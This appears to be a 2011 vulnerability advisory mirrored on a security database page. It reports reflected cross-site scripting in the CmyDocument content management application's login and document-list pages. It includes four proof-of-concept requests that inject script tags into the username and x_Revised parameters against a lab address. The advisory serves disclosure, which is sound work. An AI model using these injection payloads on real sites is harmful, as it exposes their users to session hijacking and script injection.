Search...

CmyDocument Content Management Application - XSS Vulnerabilities

2011-11-06T00:00:00
ID SECURITYVULNS:DOC:27277
Type securityvulns
Reporter Securityvulns
Modified 2011-11-06T00:00:00

Description

Title: CmyDocument Content Management Application - XSS Vulnerabilities

Software : CmyDocument Content Management Application

Software Version : Unknown(version update : 2010-01-10)

Vendor: http://cmydocument.com/

Vulnerability Published : 2011-07-11

Vulnerability Update Time :

Status :

Impact : Medium

Bug Description : CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.

Proof Of Concept : 1)username in login.asp,PoC: POST http://192.168.10.202/login.asp

username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

2)username in login2.asp,PoC: POST http://192.168.10.202/login2.asp

username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

3)x_Revised in myDoclist.asp,PoC: http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4)x_Revised in myWebDoclist.asp,PoC: http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK

JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018
Protected by